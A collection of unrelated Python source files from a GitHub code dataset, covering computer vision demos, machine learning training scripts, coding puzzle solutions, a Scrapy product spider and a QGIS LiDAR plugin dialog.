+{"seq_id":"13725327482","text":"import cv2 \nimport numpy as np\n\n# function to draw\ncount = 0\nx1 = 0\ny1 = 0\nx2 = 0\ny2 = 0\ndef draw(event, x, y, flags, param):\n global count, x1, y1, x2, y2\n if (event == cv2.EVENT_LBUTTONDOWN) and count == 0:\n x1 = x\n y1 = y\n count+=1\n elif (event == cv2.EVENT_LBUTTONDOWN) and count == 1:\n x2 = x\n y2 = y\n count = 0\n cv2.rectangle(img, pt1=(x1, y1), pt2=(x2, y2), color=(0,3,0), thickness=1)\n# else:\n# cv2.rectangle(img , pt1=(0,500), pt2=(500, 0), color=(0,0,0), thickness=-1)\n \n# connect to Callback function to draw\ncv2.namedWindow(winname = \"Title_bar\")\ncv2.setMouseCallback('Title_bar', draw)\n\n# image to show\n\nimg = np.zeros([500, 500, 3])\n\n# window operation\n\n\n# if we use \"and\" instead of \"&\" then the operation will not work because here we are doing bitwise and between \"cv2.waitKey(1)\"and\n# binary of 0xFF and checking whether the value of \"(cv2.waitKey(1) & 0xFF)\" is equal to ordinal value of q or say numeric value of \"q\"\n\n# https://stackoverflow.com/questions/35372700/whats-0xff-for-in-cv2-waitkey1\n# https://stackoverflow.com/questions/53357877/usage-of-ordq-and-0xff?rq=1\n\nwhile True:\n cv2.imshow('Title_bar', img)\n \n if (cv2.waitKey(1) & 0xFF) == ord('q'):\n break\n \ncv2.destroyAllWindows()","repo_name":"harshvardhan-anand/Artificial-Intelligence-Notes","sub_path":"ComputerVision/Notes/RectangleDrawWithMouse.py","file_name":"RectangleDrawWithMouse.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"25849316364","text":"import torch\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nfrom torchvision.models import resnet18\nimport matplotlib.pyplot as plt\n\nmodel = resnet18(num_classes=2)\noptimizer = optim.SGD(params=model.parameters(), lr=0.05)\n\n# lr_scheduler.StepLR()\n# Assuming optimizer uses lr = 0.05 for all groups\n# lr = 0.05 if epoch < 30\n# lr = 0.005 if 30 <= epoch < 60\n# lr = 0.0005 if 60 <= epoch < 90\n\nscheduler = lr_scheduler.StepLR(optimizer, step_size=30, gamma=0.1)\nplt.figure()\nx = list(range(100))\ny = []\nfor epoch in range(100):\n scheduler.step()\n lr = scheduler.get_lr()\n # print(epoch, scheduler.get_lr()[0]) # get_lr()\n y.append(scheduler.get_lr()[0])\nplt.plot(x, y)\nplt.savefig('lr_step.png')","repo_name":"PresageBoat/LRCurve","sub_path":"lr_curve/lr_step_curve.py","file_name":"lr_step_curve.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"43430623747","text":"import time\nfrom triangle import classify_triangle\n\n# examples taken from test_triangle.py\ntriangles = [\n # invalid\n (1, 2, 9), (1, 9, 2), (2, 1, 9), (2, 9, 1), (9, 1, 2), (9, 2, 1),\n (1, 1, -1), (1, -1, 1), (-1, 1, 1),\n # equilateral\n (1, 1, 1), (100, 100, 100), (99, 99, 99),\n # isosceles\n (100, 90, 90), (90, 100, 90), (90, 90, 100), (2, 2, 3),\n # scalene\n (5, 4, 3), (5, 3, 4), (4, 5, 3), (4, 3, 5), (3, 5, 4),\n]\n\n\nif __name__ == '__main__':\n # we don't really care about the output (we know the function work, from the test suite)\n # we just want to have something on which to measure running time\n\n for _ in range(3):\n for triangle in triangles:\n classify_triangle(*triangle)\n","repo_name":"bloa/magpie","sub_path":"examples/code/triangle-py_slow/run_triangle.py","file_name":"run_triangle.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"32"}
+{"seq_id":"16768992632","text":"#建立评价指标,评价模型\nimport numpy as np\nfrom users.recommend.myRecommend import *\n\n#召回率描述有多少比例的用户—物品评分记录包含在最终的推荐列表中,而准确率描述最终的推荐列表中有多少比例是发生过的用户—物品评分记录\n\ndef recall(trainset,testset,N,recommend,movie_matrix,user_matrix):\n all=0\n rec_list=0\n for user,movie in trainset.items():\n if user_matrix[user] in testset.keys():\n test_u=testset[user_matrix[user]]\n train_u=recommend(user)\n\n train_id=[]\n\n for i in range(len(movie_matrix)):\n if movie_matrix[i] in train_u:\n train_id.append(i)\n\n for item in train_id:\n if item in test_u:\n rec_list+=1\n all+=len(test_u)\n return rec_list/all\n\ndef precision(trainset,testset,N,recommend,movie_matrix,user_matrix):\n all=0\n rec_list=0\n # rs=recommendSys()\n for user,movie in trainset.items():\n if user_matrix[user] in testset.keys():\n test_u=testset[user_matrix[user]]\n train_u=recommend(user)\n\n train_id=[]\n\n for i in range(len(movie_matrix)):\n if movie_matrix[i] in train_u:\n train_id.append(i)\n\n for item in train_id:\n if item in test_u:\n rec_list+=1\n all+=N\n return rec_list/all\n\n\n#覆盖率表示最终的推荐列表中包含多大比例的物品\ndef coverage(trainset,testset,N,recommend,movie_matrix,user_matrix):\n allitems=set()\n coverageitems=set()\n for user,movie in trainset.items():\n for item in trainset[user].keys():\n allitems.add(item)\n\n train_u=recommend(user)\n\n train_id=[]\n\n for i in range(len(movie_matrix)):\n if movie_matrix[i] in train_u:\n train_id.append(i)\n\n for item in train_id:\n coverageitems.add(item)\n return len(coverageitems)/len(coverageitems)\n\n\n#新颖度:用推荐列表中物品的平均流行度度量推荐结果的新颖度,如果推荐出的物品都很热门,说明推荐的新颖度较低,否则说明推荐结果比较新颖。\ndef popularity(trainset,testset,N,recommend,movie_matrix,user_matrix):\n #得到流行表\n popularitems=dict()\n for user,movie in trainset.items():\n for item in movie.keys():\n if item not in popularitems:\n popularitems[item]=0\n popularitems[item]+=1\n res=0\n n=0\n for user,movie in trainset.items():\n train_u=recommend(user)\n\n train_id=[]\n\n for i in range(len(movie_matrix)):\n if movie_matrix[i] in train_u:\n train_id.append(i)\n\n for item in train_id:\n res+=np.log(1+popularitems[item])\n n+=1\n\n return res/n\n\n","repo_name":"iambajie/movie-recommend","sub_path":"users/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"13172919839","text":"# 给定一个二叉树,它的每个结点都存放一个 0-9 的数字,每条从根到叶子节点的路径都代表一个数字。\n#\n# 例如,从根到叶子节点路径 1->2->3 代表数字 123。 \n#\n# 计算从根到叶子节点生成的所有数字之和。 \n#\n# 说明: 叶子节点是指没有子节点的节点。 \n#\n# 示例 1: \n#\n# 输入: [1,2,3]\n# 1\n# / \\\n# 2 3\n# 输出: 25\n# 解释:\n# 从根到叶子节点路径 1->2 代表数字 12.\n# 从根到叶子节点路径 1->3 代表数字 13.\n# 因此,数字总和 = 12 + 13 = 25.\n#\n# 示例 2: \n#\n# 输入: [4,9,0,5,1]\n# 4\n# / \\\n# 9 0\n# / \\\n# 5 1\n# 输出: 1026\n# 解释:\n# 从根到叶子节点路径 4->9->5 代表数字 495.\n# 从根到叶子节点路径 4->9->1 代表数字 491.\n# 从根到叶子节点路径 4->0 代表数字 40.\n# 因此,数字总和 = 495 + 491 + 40 = 1026.\n#\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Node:\n def __init__(self, item):\n self.item = item\n self.left = None\n self.right = None\n\n\nclass Solution:\n\n def __init__(self):\n self.root = None\n\n def add(self, item):\n node = Node(item)\n if self.root is None:\n self.root = node\n else:\n q = [self.root]\n\n while True:\n pop_node = q.pop(0)\n if pop_node.left is None:\n pop_node.left = node\n return\n elif pop_node.right is None:\n pop_node.right = node\n return\n else:\n q.append(pop_node.left)\n q.append(pop_node.right)\n\n def sumNumbers(self, root):\n \"\"\"\n :type root: TreeNode\n :type sum: int\n :rtype: List[List[int]]\n \"\"\"\n res = []\n self.auxPathSum(root, [], res)\n\n return sum(res)\n\n def auxPathSum(self, root, cur_list, cur_lists):\n if not root:\n return\n if not root.left and not root.right:\n # cur_lists.append(cur_list + [root.item])\n cur_lists.append(int(''.join(str(i) for i in cur_list + [root.item])))\n return\n if root.left:\n self.auxPathSum(root.left, cur_list + [root.item], cur_lists)\n if root.right:\n self.auxPathSum(root.right, cur_list + [root.item], cur_lists)\n\n\nt = Solution()\nfor i in range(1, 4):\n t.add(i)\nprint('遍历:', t.sumNumbers(t.root))\n","repo_name":"wellqin/USTC","sub_path":"leetcode/editor/cn/[129]求根到叶子节点数字之和.py","file_name":"[129]求根到叶子节点数字之和.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"34118032047","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport tqdm\nimport matplotlib.pyplot as pl\n\n\nmnist = input_data.read_data_sets('tmp/mnist_data', one_hot=True)\n\nx_train, y_train = mnist.train.images, mnist.train.labels\n\nx = tf.placeholder(tf.float32, shape=[None, 784], name='x_place')\ny = tf.placeholder(tf.float32, shape=[None, 10], name='y_place')\n\n\nnn = tf.layers.conv2d(\n inputs=tf.reshape(x, shape=[-1, 28, 28, 1]),\n filters=32,\n kernel_size=(5, 5),\n padding='same',\n activation=tf.nn.relu\n)\n\nnn = tf.layers.max_pooling2d(\n inputs=nn,\n pool_size=(2, 2),\n strides=2,\n padding='same'\n)\n\nnn = tf.layers.conv2d(\n inputs=nn,\n filters=64,\n kernel_size=(5, 5),\n padding='same',\n activation=tf.nn.relu\n)\n\nnn = tf.layers.max_pooling2d(\n inputs=nn,\n pool_size=(2, 2),\n strides=2,\n padding='same'\n)\n\npool_dense = tf.layers.dense(tf.reshape(nn, [-1, 7 * 7 * 64]), units=1024, activation=tf.nn.relu)\nres = tf.layers.dense(pool_dense, units=10, activation=tf.nn.sigmoid)\n\nloss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(labels=y, logits=res), name='Loss')\nprediction = tf.argmax(res, axis=1)\n\noptimizer = tf.train.GradientDescentOptimizer(0.03).minimize(loss)\n\nepochs = 1200\nerrors = []\npred_error = []\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n for i in tqdm.tqdm(range(epochs)):\n batch = mnist.train.next_batch(8)\n _, err = sess.run([optimizer, loss], feed_dict={x: batch[0].reshape(8, 784),\n y: batch[1].reshape(8, 10)})\n errors.append(err)\n\n v = mnist.test.next_batch(1)\n pl.imshow(v[0].reshape(28, 28))\n pl.imshow(sess.run(nn, feed_dict={x: v[0].reshape(1, 784)}).reshape(56, 56))\n print()\n print(f\"Pred: {sess.run(prediction, feed_dict={x: v[0].reshape(1, 784)})}\")\n print(f\"Real: {v[1]}\")\n\n# pl.plot(errors)\npl.show()","repo_name":"MikhailKravets/tf","sub_path":"mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"6519433490","text":"from modelo import actualizarCama, actualizarPaciente, actualizarServicio, camasVacias, eliminarPaciente, ingresarPaciente, insertarPaciente, readCamas, readPacientes, readServicio\n\nseleccion2=0\nclass Menu:\n def __init__(self,*arg):\n self.opciones=arg\n def __str__(self) -> str:\n texto=\"seleccione una opcion\"\n for i in range(len(self.opciones)):\n texto+=f\"\\n{i+1} - {self.opciones[i]}\"\n return texto+\"\\n\"\n\n \ndef wrapCrearPaciente ():\n insertarPaciente(input(\"Inserte el nombre\\n\"), input(\"Inserte RUT del paciente\\n\"),input(\"Ingrese la fecha de nacimiento\\n\"))\n print(\"Paciente creado con èxito\")\n\ndef wrapEliminarPaciente ():\n eliminarPaciente(input(\"Nombre del paciente\\n\"))\n print(\"Paciente eliminado con èxito\")\n\ndef wrapEditarPaciente ():\n actualizarPaciente(input(\"Ingrese el nombre del paciente\\n\"), input(\"Ingrese nombre nuevo\"))\n\ndef wrapActualizarCama ():\n actualizarCama(input(\"Ingrese le nombre de la cama\\n\"), input(\"Ingrese el nuevo nombre de la cama\\n\"))\ndef wrapActualizarServicio ():\n actualizarServicio(input(\"Ingrese el nombre del servicio\\n\", input(\"Ingrese el nuevo nombre del servicio\\n\")))\n\ndef wrapIngresarPaciente ():\n ingresarPaciente(input(\"Nombre del paciente\\n\"), input(\"Nombre de la cama\\n\"), input (\"Fecha de inicio\"), input(\"Fecha final\"))\n\n\ndef menuInput (menu):\n \"\"\"\n Descripción de la función\n \"\"\" \n seleccion2 = input(menu)\n menuprincipal[int(seleccion)-1][int(seleccion2)]()\n \nmenuprincipal=[\n [lambda : menuInput(Menu(\"Crear\", \"Editar\",\"Listar\",\"Eliminar\")),\n wrapCrearPaciente,\n wrapEditarPaciente,\n readPacientes,\n wrapEliminarPaciente\n ],\n [lambda : menuInput(Menu(\"Consultar cama\", \"Editar cama\", \"Consultar servicios\", \"Editar servicios\")),\n readCamas,\n wrapActualizarCama,\n readServicio,\n wrapActualizarServicio,\n\n ],\n [lambda : menuInput(Menu(\"Ingresar paciente\", \"Consultar camas disponibles\")),\n wrapIngresarPaciente,\n camasVacias,\n ]\n]\nseleccion=input(Menu(\"Pacientes\",\"Mantenedores\",\"Gestiòn de camas\"))\n\nmenuprincipal[int(seleccion)-1][int(seleccion2)]()","repo_name":"Shadowrunner11/TrabajoIgnacio","sub_path":"vista.py","file_name":"vista.py","file_ext":"py","file_size_in_byte":2145,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"6017952931","text":"from src.models.head import Head\nfrom src.models.loss import OneNetLoss\nimport torch\nfrom src.models.object_detection.matcher import MinCostMatcher\nfrom src.nn.fpn import SimpleFPN\nfrom src.nn.vit import ViT\nfrom einops import rearrange\nfrom src.nn.adapters import ViTAdapterForNeck\nfrom src.models.object_detection.yoto import YOTOForObjectDetection\n\nbackbone = ViTAdapterForNeck(ViT(224, patch_size=16, width=768, layers=4, heads=8, output_dim=512))\nfpn = SimpleFPN(in_channels=768)\nhead = Head(256, channels=256, num_classes=2)\ncriterion = OneNetLoss(num_classes=2, matcher=MinCostMatcher())\n\n\nyoto = YOTOForObjectDetection(backbone, fpn, head)\npixel_values = torch.randn((2, 3, 224, 224))\nouts = yoto(pixel_values)\n\nclass_labels = torch.tensor(\n [\n [1, 0],\n [0, 0],\n ]\n)\nboxes_labels = torch.tensor(\n [\n [\n [0.1, 0.1, 0.3, 0.3],\n [0.2, 0.2, 0.4, 0.4],\n ],\n [[0.1, 0.1, 0.3, 0.3], [0, 0, 0, 0]], # pad\n ]\n)\nmask_labels = torch.tensor([[1, 1], [1, 0]], dtype=torch.bool)\nprint(class_labels.shape, boxes_labels.shape)\n\nfeatures = backbone(pixel_values)\nprint(features[0].shape, print(len(features)))\npyramids = fpn(features)\nouts = head(pyramids)\nlosses = criterion(*outs, class_labels, boxes_labels, torch.tensor([640]), mask_labels)\n\nprint(losses)\n","repo_name":"FrancescoSaverioZuppichini/detector","sub_path":"playgrounds/playground.py","file_name":"playground.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"32"}
+{"seq_id":"38759075509","text":"\"\"\"\nYou are given two positive numbers A and B. You need to find the maximum valued integer X such that:\nX divides A i.e. A % X = 0\nX and B are co-prime i.e. gcd(X, B) = 1\nFor example,\nA = 30\nB = 12\nWe return\nX = 5\n\"\"\"\n\n\n# We know A is the greatest number dividing A. So if A and B are coprime, we can return the value of X to be A.\n# Else, we can try to remove the common factors of A and B from A.\n# We can try to remove the common factors of A and B from A by finding the greatest common divisor\n# (gcd) of A and B and dividing A with that gcd.\n# Mathematically, A = A / gcd(A, B) —— STEP1\n# Now, we repeat STEP1 till we get gcd(A, B) = 1.\n# Atlast, we return X = A\n\nclass Solution:\n # @param A : integer\n # @param B : integer\n # @return an integer\n def cpFact(self, A, B):\n while True:\n A1 = A\n B1 = B\n # Find gcd\n while B1 > 0:\n A1, B1 = B1, A1 % B1\n if A1 == 1:\n return A\n A = A // A1\n return A\n","repo_name":"iamrishap/PythonBits","sub_path":"InterviewBits/math/largest-coprime-divisor.py","file_name":"largest-coprime-divisor.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"20542812547","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCustomer: Powerhouse Fitness\nWebsite: http://www.fitness-superstore.co.uk\nExtract all products on site, including product options\n\nTicket link: https://www.assembla.com/spaces/competitormonitor/tickets/4584-powerhouse-fitness-|-superstore-|-new-spider/details#\n\n\"\"\"\n\nimport re\n\nfrom datetime import datetime\nfrom scrapy.spider import BaseSpider\nfrom scrapy.http import Request\nfrom copy import deepcopy\n\nfrom scrapy.utils.response import get_base_url\nfrom scrapy.utils.url import urljoin_rfc\nfrom product_spiders.items import (Product, ProductLoaderWithNameStrip as ProductLoader)\nfrom scrapy.contrib.loader.processor import MapCompose, Join, TakeFirst, Identity\nfrom scrapy.contrib.loader import XPathItemLoader\nfrom scrapy.utils.markup import remove_entities\nfrom product_spiders.utils import extract_price\nimport logging\n\n\nclass ArgosCoUKKeterSpider(BaseSpider):\n name = 'powerhouse_fitness-fitness-superstore.co.uk'\n allowed_domains = ['fitness-superstore.co.uk']\n start_urls = ['http://www.fitness-superstore.co.uk/']\n \n custom_settings = {'COOKIES_ENABLED': False}\n\n def parse(self, response):\n categories = response.xpath('//ul[@id=\"nav\"]//a/@href').extract()\n for url in categories:\n yield Request(response.urljoin(url))\n\n sub_categories = response.xpath('//div[contains(@class, \"sub-cat-block\")]/a/@href').extract()\n for url in sub_categories:\n yield Request(response.urljoin(url))\n\n pages = response.xpath('//div[@class=\"pages\"]//li/a/@href').extract()\n for url in pages:\n yield Request(response.urljoin(url))\n\n products = response.xpath('//div[@class=\"product-item__name\"]//a/@href').extract()\n if products:\n category_names = response.xpath('//div[@class=\"breadcrumbs\"]//li/a/text()').extract()\n category_names += response.xpath('//div[@class=\"breadcrumbs\"]//li/strong/text()').extract()\n category_names = ' > '.join(category_names[1:])\n for url in products:\n yield Request(response.urljoin(url), callback=self.parse_product, meta={'category': category_names})\n\n identifier = response.xpath('//input[@id=\"entity_id\"]/@value').extract()\n if identifier:\n for product in self.parse_product(response):\n yield product\n\n def parse_product(self, response):\n url = response.url\n\n l = ProductLoader(item=Product(), response=response)\n\n name = response.xpath('//span[@itemprop=\"name\"]/text()').extract()\n try:\n name = name[0].strip()\n except IndexError:\n retry = response.meta.get('retry', 0)\n if retry <= 3:\n yield Request(response.url, dont_filter=True, callback=self.parse_product, meta={'retry': retry + 1})\n\n l.add_value('name', name)\n\n price = response.xpath('//p[@class=\"special-price\"]/span[@class=\"price\"]/text()').extract()\n if price:\n price = price[0]\n else:\n price = response.xpath('//span[@class=\"regular-price\"]/span[@class=\"price\"]/text()').extract()\n if price:\n price = price[0]\n l.add_value('price', price)\n\n sku = response.xpath('//div[@class=\"product-shop--sku\"]/h4/span/text()').extract()\n l.add_value('sku', sku[0])\n \n identifier = response.css('div.nosto_product span.product_id::text').extract() or response.xpath('//input[@id=\"entity_id\"]/@value').extract()\n l.add_value('identifier', identifier[0])\n\n l.add_value('category', response.meta.get('category', ''))\n\n image_url = response.xpath('//span[@class=\"image_url\"]/text()').extract()\n l.add_value('image_url', image_url)\n l.add_value('url', url)\n l.add_xpath('brand', 
'//span[@class=\"brand\"]/text()')\n \n out_of_stock = response.xpath('//div[contains(@class, \"availability-box\")]/p[contains(@class, \"out-of-stock\")]')\n if out_of_stock:\n l.add_value('stock', 0)\n\n item = l.load_item()\n\n options = response.xpath('//table[@id=\"super-product-table\"]/tbody/tr')\n if options:\n for option in options:\n option_item = deepcopy(item)\n option_item['name'] = option.xpath('td[1]/text()').extract()[0]\n price = option.xpath('td//span[@class=\"price\"]/text()').extract()\n price = extract_price(price[0]) if price else 0\n option_item['price'] = price\n identifier = option.xpath('td//input/@name').re('\\[(.*)\\]')\n if not identifier:\n identifier = option.xpath('td//span/@id').re('product-price-(.*)')\n option_item['stock'] = 0\n\n option_item['identifier'] += '-' + identifier[0]\n yield option_item\n else:\n yield item\n\n\n","repo_name":"Godsoo/scraping","sub_path":"e-commerce/CompetitorMonitor/product_spiders/spiders/powerhouse_fitness/fitness_superstore.py","file_name":"fitness_superstore.py","file_ext":"py","file_size_in_byte":4900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"30129716817","text":"\"\"\"\r\n\n\nReplace the numbers in a string with their binary form.\n\n### Examples\n\n replace_nums(\"I have 2 sheep.\") ➞ \"I have 10 sheep.\"\n \n replace_nums(\"My father was born in 1974.10.25.\") ➞ \"My father was born in 11110110110.1010.11001.\"\n \n replace_nums(\"10hell76o4 boi\") ➞ \"1010hell1001100o100 boi\"\n\n### Notes\n\n * There are possibly two or more numbers in a single word (I do not recommend splitting the text at spaces, it surely won't help).\n * Anything separates two numbers, even spaces (\"2 2\" --> \"10 10\").\n\n\"\"\"\r\n\ndef replace_nums(string):\n newstring,num = \"\",\"\"\n for index,i in enumerate(string):\n if not i.isdigit():\n if num != \"\":\n newstring += bin(int(num))[2:]\n num = \"\"\n newstring += i\n else:num += i\n return newstring\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"kfwTnnJjo3SKG2pYx_2.py","file_name":"kfwTnnJjo3SKG2pYx_2.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"9514431246","text":"from keras.datasets import boston_housing\nfrom keras.models import Sequential\nfrom keras.layers import Dense, LSTM, Dropout\n\n(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()\n\nprint(train_data.shape)\nprint(test_data.shape)\n\n# ...Scaler 사용해서 정규화\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\nscaler = StandardScaler()\n# scaler = MinMaxScaler()\n\nscaler.fit(train_data)\ntrain_data = scaler.transform(train_data)\ntest_data = scaler.transform(test_data)\n\nfrom keras import models\nfrom keras import layers\n\ndef build_model():\n # 동일한 모델을 여러 번 생성할 것이므로 함수를 만들어 사용합니다.\n model = models.Sequential()\n model.add(layers.Dense(32, activation='relu', input_shape=(train_data.shape[1],)))\n model.add(layers.Dense(64, activation='relu'))\n model.add(layers.Dense(64, activation='relu'))\n model.add(layers.Dense(64, activation='relu'))\n model.add(layers.Dense(64, activation='relu'))\n model.add(layers.Dense(1))\n model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])\n return model\n\nseed = 77\nfrom keras.wrappers.scikit_learn import KerasClassifier, KerasRegressor\nfrom sklearn.model_selection import KFold, cross_val_score\nmodel = KerasRegressor(build_fn=build_model, epochs=10,\n batch_size=1, verbose=1)\nkfold = KFold(n_splits=5, shuffle=True, random_state=seed)\nresults = cross_val_score(model, train_data, train_targets, cv=kfold) # cv == cross Validation 교차검증\n\nimport numpy as np\nprint(results)\nprint(np.mean(results))\n\n# 1. 사이킷런의 KFold로 리파인 시킬 것\n# 2. 정규화 표준화 시킬 것\n# 3. np.mean(all_scores)를 1 이하로 낮출 것\n\n\n# from sklearn.model_selection import KFold\n# kf = KFold(n_splits=5)\n# for train_index, test_index in kf.split(train_data, train_targets):\n# partial_train_data, val_data = train_data[train_index], train_data[test_index]\n# partial_train_targets, val_targets = train_targets[train_index], train_targets[test_index]\n# print(train_index, test_index)\n\n","repo_name":"jamiedotpro/etc","sub_path":"keras/keras31_kfold.py","file_name":"keras31_kfold.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"9785322318","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n/***************************************************************************\r\n LiDARForestryHeight\r\n A QGIS plugin. LiDAR Forestry Height\r\n generates a DEM with the forest height,\r\n calculated from a classified LiDAR point\r\n cloud using LasPy Library\r\n\r\n Generated by Plugin Builder: http://g-sherman.github.io/Qgis-Plugin-Builder/\r\n -------------------\r\n begin : 2018-09-24\r\n copyright : (C) 2019 by PANOimagen S.L.\r\n email : info@panoimagen.com\r\n git sha : $Format:%H$\r\n ***************************************************************************/\r\n\r\n/***************************************************************************\r\n * *\r\n * This program is free software; you can redistribute it and/or modify *\r\n * it under the terms of the GNU General Public License as published by *\r\n * the Free Software Foundation; either version 2 of the License, or *\r\n * (at your option) any later version. *\r\n * *\r\n ***************************************************************************/\r\n\"\"\"\r\nfrom __future__ import unicode_literals\r\nimport os\r\n\r\nfrom qgis.PyQt import uic\r\nfrom qgis.PyQt import QtWidgets\r\n\r\nimport logging\r\nlogger = logging.getLogger(\"lfh\")\r\nlogger.setLevel(logging.DEBUG)\r\n\r\nfrom qgis.core import Qgis, QgsRasterLayer, QgsProject\r\nfrom qgis.gui import QgisInterface, QgsMessageBar\r\n\r\nfrom .lfh_errors import LasPyNotFoundError\r\n\r\ntry:\r\n from . import plugin_process\r\n LASPY_INSTALLED = True\r\nexcept LasPyNotFoundError as e:\r\n LASPY_INSTALLED = False\r\n \r\nfrom. import files_paths_funs as dir_fns\r\n\r\nFORM_CLASS, _ = uic.loadUiType(os.path.join(\r\n os.path.dirname(__file__), 'LiDARForestryHeight_dialog_base.ui'))\r\n\r\n\r\nclass LiDARForestryHeightDialog(QtWidgets.QDialog, FORM_CLASS):\r\n def __init__(self, parent=None):\r\n \"\"\"Constructor.\"\"\"\r\n super(LiDARForestryHeightDialog, self).__init__(parent)\r\n # Set up the user interface from Designer.\r\n # After setupUI you can access any designer object by doing\r\n # self., and you can use autoconnect slots - see\r\n # http://qt-project.org/doc/qt-4.8/designer-using-a-ui-file.html\r\n # #widgets-and-dialogs-with-auto-connect\r\n self.setupUi(self)\r\n self._initUi()\r\n self.iface = QgisInterface\r\n self.buttonBox.accepted.connect(self.accept)\r\n self.buttonBox.accepted.connect(self.preparingProcess)\r\n self.buttonBox.rejected.connect(self.reject)\r\n\r\n self.addResultsCheckBox.setChecked(True)\r\n self.createAndLoadIntermCheckBox.setChecked(False)\r\n\r\n self.outputFolderToolButton.clicked.connect(self.setOutPath)\r\n self.inputToolButton.clicked.connect(self.inputLiDAR)\r\n\r\n def _initUi(self):\r\n from . import version_number\r\n version = version_number.get_version_from_metadata()\r\n self.versionLabel.setText(u'Version: {}'.format(version))\r\n\r\n if LASPY_INSTALLED:\r\n text = u'LasPy Library avaible'\r\n color = u'color: black'\r\n else:\r\n text = (u'LasPy Library is not installed. 
Visit' +\r\n u' plugin homepage or LasPy documentation')\r\n color = u'color: red'\r\n\r\n self.lasPyInstalledLabel.setText(text)\r\n self.lasPyInstalledLabel.setStyleSheet(color)\r\n\r\n interpolate_methods = ['nearest', 'linear', 'cubic']\r\n self.interpolatingMethodComboBox.addItems(interpolate_methods)\r\n\r\n self.updateUi()\r\n\r\n def updateUi(self):\r\n \"\"\" Enable/disable UI options if LasPy Library is/isn't installed\r\n \"\"\"\r\n self.pluginGroupBox.setEnabled(LASPY_INSTALLED)\r\n self.inputGroupBox.setEnabled(LASPY_INSTALLED)\r\n self.resultsParamsGroupBox.setEnabled(LASPY_INSTALLED)\r\n\r\n def inputLiDAR(self):\r\n fileNames = QtWidgets.QFileDialog.getOpenFileNames(self,\r\n u\"Select the input LiDAR classified file/s\",\r\n self.inputLineEdit.text(),\r\n (\"LiDAR files (*.laz *.LAZ* *.las *.LAS);;\" +\r\n \" All files (*)\"))\r\n if fileNames:\r\n # quoted = ['\"{}\"'.format(fn) for fn in fileNames]\r\n self.inputLineEdit.setText(\", \".join(fileNames[0]))\r\n if not self.outputFolderLineEdit.text():\r\n try:\r\n outPath = os.path.join(\r\n os.path.split(os.path.abspath(fileNames[0][0]))[0],\r\n u'lidar_forestry_height_output')\r\n self.outputFolderLineEdit.setText(outPath)\r\n except IndexError:\r\n pass\r\n\r\n def setOutPath(self):\r\n \"\"\"Function to select the output folder and update the LineEdit\r\n \"\"\"\r\n outPath = QtWidgets.QFileDialog.getExistingDirectory(self,\r\n u\"Select the output folder\",\r\n self.outputFolderToolButton.text())\r\n if outPath:\r\n self.outputFolderLineEdit.setText(os.path.join(\r\n outPath, u'lidar_forestry_height_output'))\r\n\r\n def preparingProcess(self):\r\n\r\n if not LASPY_INSTALLED:\r\n self.showQMessage(u\"Error: LasPy Library is not installed!\" +\r\n u\"\\nPlease, solve it. More information\" +\r\n u\" at plugin homepage.\")\r\n return\r\n\r\n filenames = self.inputLineEdit.text()\r\n\r\n if not filenames:\r\n self.showQMessage(u\"Error: Not input file selected!\\nPlease,\" +\r\n u\" select one.\")\r\n\r\n outPath = self.outputFolderLineEdit.text()\r\n\r\n if not outPath:\r\n self.showQMessage(u\"Error: Not output folder selected!\\n\" +\r\n u\"Please, select one.\")\r\n\r\n if filenames and outPath:\r\n for f in filenames.split(\",\"):\r\n full_filename = f.strip()\r\n _, filename = os.path.split(full_filename)\r\n if outPath:\r\n self.settingProcessParams(full_filename, outPath)\r\n\r\n def settingProcessParams(self, full_filename, outPath):\r\n\r\n self.pixel_size = self.pixelSizeDoubleSpinBox.value()\r\n self.inter_method = self.interpolatingMethodComboBox.currentText()\r\n self.load_result = self.addResultsCheckBox.isChecked()\r\n self.partials_create_load = self.createAndLoadIntermCheckBox.isChecked()\r\n\r\n _, filename = os.path.split(full_filename)\r\n base_name, ext = os.path.splitext(filename)\r\n start_index = 1\r\n out_path = os.path.join(\r\n outPath, (base_name + '_r' + str(start_index)))\r\n\r\n if os.path.exists(out_path):\r\n import glob\r\n key_for_glob = os.path.join(outPath, (base_name + '_r*' ))\r\n 